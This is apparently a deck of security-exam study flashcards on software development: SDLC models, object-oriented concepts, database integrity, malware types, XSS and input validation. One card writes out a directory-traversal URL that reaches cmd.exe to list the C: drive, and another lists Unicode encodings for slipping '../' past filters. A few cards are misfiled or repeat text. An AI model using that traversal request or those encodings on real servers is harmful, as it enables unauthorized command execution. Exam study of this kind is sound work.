Software Development Lifecycle Flashcards

1
Q

What is the attack surface?

A

The attack surface is the collection of possible entry points for an attacker. The reduction of this surface reduces the possible ways that an attacker can exploit a system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What is Computer Aided Software Engineering (CASE)?

A

Computer-aided software engineering refers to any type of software that allows for the automated development of software, which can come in the form of program editors, debuggers, code analyzers, version-control mechanisms, and more. The goals are to increase development speed and productivity and reduce errors.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is fuzzing?

A

Fuzzing is the act of sending random data to the target program in order to trigger failures.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What does ISO/IEC 27034 cover?

A

The ISO/ IEC 27034 standard covers the following items: application security overview and concepts, organization normative framework, application security management process, protocols and application security control data structure, case studies, and application security assurance prediction.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is The Open Web Application Security Project (OWASP)?

A

The Open Web Application Security Project (OWASP) is an organization dedicated to helping the industry develop more secure software.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What are the levels of CMMI?

A
The CMMI model uses five maturity levels designated by the numbers 1 through 5. Each level represents the maturity level of the process quality and optimization. The levels are organized as follows: 
1 = Initial, 
2 = Repeatable, 
3 = Defined, 
4 = Managed, 
5 = Optimizing.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

At what point should change control be implemented?

A

Change control needs to be put in place at the beginning of a project and must be enforced through each phase. Changes must be authorized, tested, and recorded. The changes must not affect the security level of the system or its capability to enforce the security policy.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

List the different Software Development Lifecycle Models?

A

There are several SDLC models:

Waterfall (sequential approach that requires each phase to complete before the next one can begin)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What are the various application testing methods?

A

Incremental (multiple development cycles are components)

integration (verifying components work together in the production environment),

acceptance (ensuring code meets customer requirements),

regression (testing after changes take place),

static analysis (reviewing programming code)

dynamic analysis (reviewing code during execution).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Rapid Application Development (RAD) (SDLC)

A

Rapid Application Development (combines prototyping and iterative development procedures with the goal of accelerating the software development process),

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Agile (SDLC) Model

A

Agile (iterative and incremental development processes that encourage team-based collaboration, and flexibility and adaptability are used instead of a strict process structure).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Incremental (SDLC) Model

A

Incremental (multiple development cycles are carried out on a piece of software throughout its development stages),

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Prototyping (SDLC) Model

A

Prototyping (creating a sample of the code for proof-of-concept purposes)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

V-Model (SDLC) Model

A

V-model (emphasizes verification and validation at each phase)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What is the Software Configuration Management (SCM)?

A

Software configuration management (SCM) is the task of tracking and controlling changes in the software through the use of authentication, revision control, the establishment of baselines, and auditing. It has the purpose of maintaining software integrity and traceability throughout the software development life cycle.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is Generation 1 programming Language?

A

Programming languages have gone through evolutionary processes.
Generation one is machine language (binary format).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

What is Generation 2 programming Language?

A

Generation two is assembly language (which is translated by an assembler into machine code).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

What is Generation 3 programming Language?

A

Generation three is high-level language (which provides a level of abstraction).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

What is Generation 4 programming Language?

A

Generation four is a very high-level language (which provides more programming abstraction).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

What is Generation 5 Programming language?

A

Generation five is natural language (which is used for artificial intelligence purposes).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

What is data modeling?

A

Data modeling is a process used to define and analyze data requirements needed to support the business processes within the scope of corresponding systems and software applications.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

What features does Object Oriented programing provide?

A

Object-oriented programming provides modularity, reusability, and more granular control within the programs themselves compared to classical programming languages.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Describe the role of Objects in Object Oriented Programming?

A

Objects are members, or instances, of classes. The classes dictate the objects’ data types, structure, and acceptable actions.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

How do objects in OOP communicate?

A

In OOP, objects communicate with each other through messages, and a method is functionality that an object can carry out. Objects can communicate properly because they use standard interfaces.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

Define Polymorphism?

A

Polymorphism is when different objects are given the same input and react differently.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

Describe the internal operations of objects?

A

Data and operations internal to objects are hidden from other objects, which is referred to as data hiding. Each object encapsulates its data and processes.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

Describe the char of OO Design?

A

Object-oriented design represents a real-world problem and modularizes the problem into cooperating objects that work together to solve the problem.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

What is Coupling?

A

If an object does not require much interaction with other modules, it has low coupling.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

What’s the best programming design?

A

The best programming design enables objects to be as independent and as modular as possible; therefore, the higher the cohesion and the lower the coupling, the better.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

What is an Object Request Broker (ORB)

A

An object request broker (ORB) manages communications between objects and enables them to interact in a heterogeneous and distributed environment.

.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

What is the Common Object Request Broker Architecture (CORBA)?

A

Common Object Request Broker Architecture (CORBA) provides a standardized way for objects within different applications, platforms, and environments to communicate. It accomplishes this by providing standards for interfaces between objects.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

What is a Component Object Model (COM)?

A

Component Object Model (COM) provides an architecture for components to interact on a local system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

What is a Distributed Component Object Model (DCOM)?

A

Distributed COM (DCOM) uses the the same interfaces as COM, but enables components to interact over a distributed, or networked, environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

What is Open Database Connectivity (ODBC)?

A

Open Database Connectivity (ODBC) enables several different applications to communicate with several different types of databases by calling the required driver and passing data through that driver.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

What is Object linking and embedding?

A

Object linking and embedding (OLE) enables a program to call another program (linking) and permits a piece of data to be inserted inside another program or document (embedding).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

Define Service oriented architecture (SOA)?

A

Service-oriented architecture (SOA) provides standardized access to the most needed services to many different applications at one time. Service interactions are self-contained and loosely coupled so that each interaction is independent of any other interaction.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

What are security features of Java programming language?

A

Java security employs a sandbox so the applet is restricted from accessing the user’s hard drive or system resources. Programmers have figured out how to write applets that escape the sandbox.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

What is SOAP?

A

SOAP allows programs created with different programming languages and running on different operating systems to interact without compatibility issues.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

What are the 3 main types of Cross-Site Scripting (XSS)?

A
There are three main types of cross-site scripting (XSS) attacks: 
nonpersistent XSS (exploiting the lack of proper input or output validation on dynamic websites), 
persistent XSS (attacker loads malicious code on a server that attacks visiting browsers), 

DOM (attacker uses the DOM environment to modify the original client-side JavaScript).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

Define Database management System?

A

A database management system (DBMS) is the software that controls the access restrictions, data integrity, redundancy, and the different types of manipulation available for a database.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

What is the database Primary Key?

A

A database primary key is how a specific row is located from other parts of the database in a relational database.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

What is the purpose of a DB View?

A

A view is an access control mechanism used in databases to ensure that only authorized subjects can access sensitive information.

A database view is put into place to prevent certain users from viewing specific data. This is a preventive measure, because the administrator is preventing the users from seeing data not meant for them. This is one control to prevent inference attacks.

.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

What are the uses of relational database?

A

A relational database uses two-dimensional tables with rows (tuples) and columns (attributes).

44
Q

What are hierarchical database?

A

A hierarchical database uses a tree-like structure to define relationships between data elements, A hierarchical database uses a tree-like structure to define relationships between data elements,

45
Q

What is a data definition language (DDL)?

A

Defines the structure and schema of the database. The structure could mean the table size, key placement, views, and data element relationship. The schema describes the type of data that will be held and manipulated, and their properties. It defines the structure of the database, access operations, and integrity procedures.

46
Q

What is Data Manipulation Language (DML)?

A

Contains all the commands that enable a user to view, manipulate, and use the database (view, add, modify, sort, and delete

47
Q

What is Query Language?

A

Enables users to make requests of the database.

48
Q

Where is Report Generator?

A

Produces printouts of data in a user-defined manner.

49
Q

What’s the purpose of a commit statement in a database?

A

A commit statement saves all changes to the database.

50
Q

What is the purpose of a checkpoint in transaction?

A

A checkpoint is used if there is a system failure or problem during a transaction. The user is then returned to the state of the last checkpoint.

51
Q

When does Aggregation occur?

A

Aggregation can happen if a user does not have access to a group of elements, but has
access to some of the individual elements within the group. Aggregation happens if the user combines the information of these individual elements and figures out the information of the group of data elements, which is at a higher sensitivity level.

52
Q

What is Inference?

A

Inference is the capability to derive information that is not explicitly available.

53
Q

What are attempts to prevent Inference attacks?

A

Common attempts to prevent inference attacks are partitioning the database, cell suppression, and adding noise to the database.

54
Q

What is Polyinstantiation?

A

Polyinstantiation is the process of allowing a table to have multiple rows with the same primary key. The different instances can be distinguished by their security levels or classifications.

55
Q

Define Data Warehousing?

A

Data warehousing combines data from multiple databases and data sources.

56
Q

What is Data Mining?

A

Data mining is the process of searching, filtering, and associating data held within a data warehouse to provide more useful information to users.

57
Q

What is a Polymorphic Virus?

A

A polymorphic virus tries to escape detection by making copies of itself and modifying the code and attributes of those copies.

58
Q

What is a Logic Bomb?

A

A logic bomb executes a program when a predefined event takes place, or a date and time are met.

59
Q

Describe a Trojan Horse?

A

A Trojan horse is a program that performs useful functionality apparent to the user and malicious functionally without the user knowing it.

60
Q

When is Anti-malware Software most effective?

A

Antimalware software is most effective when it is installed in every entry and end point and covered by a policy that delineates user training as well as software configuration and updating.

61
Q

What is DevOps?

A

DevOps is a type of integrated product team (IPT) that focuses on three communities: software development, IT operations, and quality assurance. The idea is to reduce the friction that oftentimes exists between the developers and IT staff in order to improve quality and velocity.

62
Q

What is the difference between Instantiation and Polyinstantiation?

A

Instantiation is what happens when an object is created from a class.

Polyinstantiation is when more than one object is made and the other copy is modified to have different attributes. This can be done for several reasons.

polyinstantiation can be used for security purposes to ensure that a lower-level subject could not access an object at a higher level.

63
Q

What is the meaning of Partitioning?

A

Partitioning means to logically split the database into parts.

.

64
Q

what does Cell suppression mean?

A

Cell suppression means that specific cells in a DB are not viewable by certain users.

65
Q

What is the purpose of noise and perturbation in a DB?

A

noise and perturbation is when bogus information is inserted into the database to try to give potential attackers incorrect information.

66
Q

What are the components of ACID test?

A

Atomicity - Divides transactions into units of work and ensures that all modifications take effect or none take effect. Either the changes are committed or the database is rolled back.

  • Consistency - A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases.
  • Isolation - Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed.
  • Durability - Once the transaction is verified as accurate on all systems, it is committed and the databases cannot be rolled back.
67
Q

What are the phases of the Software Development Lifecycle?

A
  1. Requirements gathering
  2. Design
  3. Development
  4. Testing/ Validation
  5. Release/ Maintenance
68
Q

What is Software Unit Testing?

A

Unit testing
Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions.

69
Q

What is Software Integration Testing?

A

Integration testing Verifying that components work together as outlined in design specifications.

70
Q

What is Software Acceptance Testing?

A

Acceptance testing Ensuring that the code meets customer requirements.

71
Q

What is software Regression Testing?

A

Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection.

72
Q

What is Garbage Collection?

A

Garbage collection is an automated way for software to carry out part of its memory management tasks.

A garbage collector identifies blocks of memory that were once allocated but are no longer in use and deallocates the blocks and marks them as free. It also gathers scattered blocks of free memory and combines them into larger blocks.

It helps provide a more stable environment and does not waste precious memory. Some programming languages, such as Java, perform automatic garbage collection; others, such as C, require the developer to perform it manually, thus leaving opportunity for error.

73
Q

What is Joint Analysis Development (JAD) ?

A

Joint Analysis Development (JAD) A method that uses a team approach in application development in a workshop-oriented environment.

74
Q

What is the Reuse Model?

A

Reuse model is a model that approaches software development by using progressively developed models. Reusable programs are evolved by gradually modifying pre-existing prototypes to customer specifications. Since the reuse model does not require programs to be built from scratch, it drastically reduces both development cost and time.

75
Q

What is the Cleanroom approach?

A

Cleanroom - An approach that attempts to prevent errors or mistakes by following structured and formal methods of developing and testing. This approach is used for high-quality and critical applications that will be put through a strict certification process.

76
Q

What is Fuzz testing?

A

Fuzz testing or fuzzing is a software testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted.

77
Q

One of the characteristics of object-oriented programming is deferred commitment. Which of the following is the best description for this characteristic?

A

Modularity Autonomous objects, cooperation through exchanges of messages.

  • Deferred commitment The internal components of an object can be redefined without changing other parts of the system.
  • Reusability Refining classes through inheritance. Other programs using the same objects.
  • Naturalness Object-oriented analysis, design, and modeling map to business needs and solutions.
78
Q

Describe Buffer Overflow

A

The buffer overflow is probably the most notorious of input validation mistakes. A buffer is an area reserved by an application to store something in it, such as some user input. After the application receives the input, an instruction pointer points the application to do something with the input that’s been put in the buffer.

A buffer overflow occurs when an application erroneously allows an invalid amount of input to be written into the buffer area, overwriting the instruction pointer in the code that tells the program what to do with the input. Once the instruction pointer is overwritten, whatever code has been placed in the buffer can then be executed, all under the security context of the application.

tion.

79
Q

What is the nonpersistent cross-site scripting vulnerability?

A

The nonpersistent cross-site scripting vulnerability is when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response. The persistent XSS vulnerability occurs when the data provided by the attacker is saved by the server and then permanently displayed on “normal” pages returned to other users in the course of regular browsing without proper HTML escaping. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.

80
Q

What is the non-persistent cross-site scripting vulnerability?

A

The non-persistent cross-site scripting vulnerability is when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response.

The persistent XSS vulnerability occurs when the data provided by the attacker is saved by the server and then permanently displayed on “normal” pages returned to other users in the course of regular browsing without proper HTML escaping.

DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.

81
Q

What are the characteristics of ADO?

A

The following are correct characteristics of ADO:

  • It’s a high-level data access programming interface to an underlying data access technology (such as OLE DB).
  • It’s a set of COM objects for accessing data sources, not just database access.
  • It allows a developer to write programs that access data without knowing how the database is implemented.
  • SQL commands are not required to access a database when using ADO.
82
Q

What is Semantic Integrity mechanism?

A

A semantic integrity mechanism makes sure structural and semantic rules are enforced. These rules pertain to data types, logical values, uniqueness constraints, and operations that could adversely affect the structure of the database.

83
Q

What is referential integrity?

A

A database has referential integrity if all foreign keys reference existing primary keys. There should be a mechanism in place that ensures no foreign key contains a reference to a primary key of a nonexistent record, or a null value.

84
Q

What is Entity integrity?

A

Entity integrity guarantees that the tuples are uniquely identified by primary key values. For the sake of entity integrity, every tuple must contain one primary key. If it does not have a primary key, it cannot be referenced by the database.

85
Q

National Software Reference Library (NSRL)

A

The National Software Reference Library (NSRL) is the only term that was not addressed in this chapter. It comprises a collection of digital signatures of known, traceable software applications intended to assist in the investigation of crimes involving computers. All other three answers are part of a rigorous assessment of the security of acquired software.

86
Q

Software configuration management (SCM)

A

Software configuration management (SCM) identifies the attributes of software at various points in time, and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release.

87
Q

service-oriented architecture (SOA)

A

A service-oriented architecture (SOA) provides standardized access to the most needed services to many different applications at one time. This approach allows for different business applications to access the current web services available within the environment.

88
Q

what is a mashup?

A

A mashup is the combination of functionality, data, and presentation capabilities of two or more sources to provide some type of new service or functionality. Open APIs and data sources are commonly aggregated and combined to provide a more useful and powerful resource.

89
Q

What is a WSDL?

A

WSDL describes the web service’s specifications.

90
Q

What does a Web service provides?

A

Web service provides the application functionality.

91
Q

What does UDDI provide?

A

UDDI provides the mechanisms for web services to be posted and discovered.

92
Q

What is SOAP?

A

SOAP allows for the exchange of messages between a requester and provider of a web service.

93
Q

What’s the importance of the “%20” characters?

A

The characters “% 20” are encoding values that attackers commonly use in URL encoding attacks. These encoding values can be used to bypass web server filtering rules and can result in the attacker being able to gain unauthorized access to components of the web server. The characters “../” can be used by attackers in similar web server requests, which instruct the web server software to traverse directories that should be inaccessible.

94
Q

What is Client-side validation process?

A

Client-side validation is being carried out. This procedure ensures that the data that is inserted into the form contains valid values before being sent to the web server for processing.

The web server should not just rely upon client-side validation, but should also carry out a second set of procedures to ensure that the input values are not illegal and potentially malicious.

.

95
Q

Heuristic (behavior) malware detection

A

Heuristic detection and behavior blocking is considered proactive and can detect new malware, sometimes called “zero day” attacks.

96
Q

Signature-based (malware )detection

A

Signature-based detection cannot detect new malware.

97
Q

What are the servers that send the bots instructions and manage the botnets called?

A

The servers that send the bots instructions and manage the botnets are commonly referred to as command-and-control (C& C) servers, and they can maintain thousands or millions of computers at one time.
.

98
Q

What are the 6 main elements of malware (not all required to be in place)?

A

Insertion Installs itself on the victim’s system
• Avoidance Uses methods to avoid being detected

  • Eradication Removes itself after the payload has been executed
  • Replication Makes copies of itself and spreads to other victims
  • Trigger Uses an event to initiate its payload execution
  • Payload Carries out its function (that is, deletes files, installs a back door,
99
Q

What’s a stealth virus?

A

A stealth virus hides the modifications it has made to files or boot records. This can be accomplished by monitoring system functions used to read files or sectors and forging the results. This means that when an antimalware program attempts to read an infected file or sector, the original uninfected form will be presented instead of the actual infected form.

The virus can hide itself by masking the size of the file it is hidden in or actually move itself temporarily to another location while an antimalware program is carrying out its scanning process. So a stealth virus is a virus that hides its tracks after infecting a system.

Once the system is infected, the virus can make modifications to make the computer appear the same as before. The virus can show the original file size of a file it infected instead of the new, larger size to try to trick the antimalware software into thinking no changes have been made.

100
Q

What is Parameter validation?

A

Parameter validation is where the values that are being received by the application are validated to be within defined limits before the server application processes them within the system. The main difference between parameter validation and input validation would have to be whether the application was expecting the user to input a value as opposed to an environment variable that is defined by the application.

101
Q

What is Path or directory traversal (Input Validation)?

A

Path or directory traversal This attack is also known as the “dot dot slash” back up or traverse into directories that weren’t supposed to be accessible from the Web. The command “../” at the command prompt tells the system to back up to the previous directory (i.e., “cd ../”). If a web server’s default directory is c:\ inetpub\ www, a URL requesting http:// www.website.com/ scripts/../../../../../ windows/ system32/ cmd.exe?/ c + dir + c:\ would issue the command to back up several directories to ensure it has gone all the way to the root of the drive and then make the request to change to the operating system directory (windows\ system32) and run the cmd.exe listing the contents of the C: drive. Access to the command shell allows extensive access for the attacker.

102
Q

What is Input Validation?

A

Validating that these requests are allowed is part of input validation and is usually tied to coded validation rules within the web server software. Attackers have figured out how to bypass some of these coded validation rules.

103
Q

What is Unicode encoding?

A

Unicode is an industry-standard mechanism developed to represent the entire range of over 100,000 textual characters in the world as a standard coding format. Web servers support Unicode to support different character sets (for different languages), and, at one time, many web server software applications supported it by default. So, even if we told our systems to not allow the “../” directory traversal request previously mentioned, an attacker using

Unicode could effectively make the same directory traversal request without using “/” but with any of the Unicode representations of that character (three exist: %c1% 1c, %c0% 9v, and %c0% af). That request may slip through unnoticed and be processed.

104
Q

What is URL encoding?

A

URL encoding Ever notice a “space” that appears as “% 20” in a URL in a web browser? The “% 20” represents the space because spaces aren’t allowed characters in a URL. Much like the attacks using Unicode characters, attackers found that they could bypass filtering techniques and make requests by representing characters differently.

105
Q

What is Client Side Validation?

A

Client-side validation is when the input validation is done at the client before it is even sent back to the server to process. If you’ve missed a field in a web form and before clicking Submit, you immediately receive a message informing you that you’ve forgotten to fill in one of the fields, you’ve experienced client-side validation. Client-side validation is a good idea because it avoids incomplete requests being sent to the server and the server having to send back an error message to the user.

106
Q

What are Specific Threats for Web Environments ?

A
The most common types of vulnerabilities, threats, and complexities are covered in the following sections, which we will explore one at a time:
 • Administrative interfaces
 • Authentication and access control 
• Input validation
 • Parameter validation
 • Session management